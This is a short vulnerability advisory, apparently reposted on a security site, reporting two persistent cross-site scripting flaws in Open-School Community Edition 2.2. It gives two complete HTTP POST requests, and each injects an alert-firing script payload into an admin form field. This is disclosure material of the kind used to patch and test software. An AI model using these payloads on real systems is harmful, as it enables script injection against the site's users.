Open-School Community Edition 2.2 Cross Site Scripting

2014.02.28
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ============================================================== # Title ...| Open-School Community Edition 2.2 # Version .| osv2.2-CE.zip # Date ....| 23.02.2014 # Found ...| HauntIT Blog # Home ....| http://sourceforge.net # ============================================================== [+] From admin user: # ============================================================== # 1. Persistent XSS ---<request>--- POST /k/cms/osv/index.php?r=courses/courses/create HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 378 Courses%5Bcourse_name%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&Courses%5Bcode%5D=test&Courses%5Bsection_name%5D=test&Courses%5Bis_deleted%5D=0&Courses%5Bcreated_at%5D=2014-02-27&Courses%5Bupdated_at%5D=2014-02-27&Batches%5Bname%5D=test&Batches%5Bstart_date%5D=Feb+13.2014&Batches%5Bend_date%5D=Feb+28.2014&Batches%5Bis_active%5D=1&Batches%5Bis_deleted%5D=0&yt0=Save ---<request>--- # ============================================================== # 2. Persistent XSS ---<request>--- POST /k/cms/osv/index.php?r=rights/authItem/create&type=0 HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 161 AuthItemForm%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&AuthItemForm%5Bdescription%5D=sadasd&AuthItemForm%5BbizRule%5D=&AuthItemForm%5Bdata%5D=&yt0=Save ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top